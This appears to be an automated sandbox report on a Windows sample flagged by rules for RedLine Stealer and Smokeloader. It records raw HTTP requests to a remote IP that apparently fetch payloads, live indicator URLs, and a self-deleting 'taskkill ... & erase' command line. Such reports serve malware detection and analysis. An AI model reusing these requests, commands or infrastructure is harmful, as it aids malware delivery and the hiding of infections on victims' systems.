Source: http://80.66.75.114/files/download |
Virustotal: Detection: 18% |
Perma Link |
Source: http://80.66.75.114/6.75.114/add?substr=one&s=two |
Virustotal: Detection: 9% |
Perma Link |
Source: http://80.66.75.114/files/download4/files/download |
Virustotal: Detection: 8% |
Perma Link |
Source: http://80.66.75.114/files/downloadData |
Virustotal: Detection: 15% |
Perma Link |
Source: http://80.66.75.114/ |
Virustotal: Detection: 16% |
Perma Link |
Source: http://80.66.75.114/files/downloadP |
Virustotal: Detection: 12% |
Perma Link |
Source: http://80.66.75.114/files/downloadN |
Virustotal: Detection: 8% |
Perma Link |
Source: http://80.66.75.114/files/downloadL |
Virustotal: Detection: 9% |
Perma Link |
Source: http://80.66.75.114/add?substr=one&s=two |
Virustotal: Detection: 15% |
Perma Link |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.66.75.114 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004018E0 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar, |
0_2_004018E0 |
Source: global traffic |
HTTP traffic detected: GET /add?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2073934684.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/ |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/6.75.114/add?substr=one&s=two |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2073485392.0000000000893000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/add?substr=one&s=two |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/add?substr=one&s=twoi |
Source: file.exe, 00000000.00000003.1905305826.00000000008AC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/download |
Source: file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/download4/files/download |
Source: file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/download4/files/downloadP |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/downloadData |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/downloadL |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/downloadLMEM |
Source: file.exe, 00000000.00000003.1829531312.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1860003838.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.00000000008AC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/downloadN |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/files/downloadP |
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://80.66.75.114/wi |
Source: Amcache.hve.9.dr |
String found in binary or memory: http://upx.sf.net |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00404530 |
0_2_00404530 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00422900 |
0_2_00422900 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004132D4 |
0_2_004132D4 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00413AB9 |
0_2_00413AB9 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004096D0 |
0_2_004096D0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F9937 |
0_2_005F9937 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0060353B |
0_2_0060353B |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F4797 |
0_2_005F4797 |
Source: 00000000.00000002.2073463747.00000000007C4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12 |
Source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004018E0 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar, |
0_2_004018E0 |
Source: C:\Windows\SysWOW64\taskkill.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "file.exe") |
Source: unknown |
Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1504 |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: msimg32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: msvcr100.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: framedynos.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: winsta.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004083EE push ecx; ret |
0_2_00408401 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040FEBA push es; ret |
0_2_0040FEBB |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0060407F push esp; retf |
0_2_00604087 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00600121 push es; ret |
0_2_00600122 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0060C575 push ss; retf |
0_2_0060C579 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F8655 push ecx; ret |
0_2_005F8668 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0060467D push esp; retf |
0_2_0060467E |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C7443 push ecx; ret |
0_2_007C7444 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C68FD pushfd ; ret |
0_2_007C6905 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C7117 push ecx; ret |
0_2_007C7118 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C81F5 pushad ; ret |
0_2_007C81F9 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C5E78 pushad ; retf |
0_2_007C5EB4 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C9EC4 push ecx; ret |
0_2_007C9F0C |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C9E93 push ecx; ret |
0_2_007C9F0C |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C871B push es; ret |
0_2_007C871C |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C9F0D push ecx; ret |
0_2_007C9F0C |
Source: C:\Users\user\Desktop\file.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
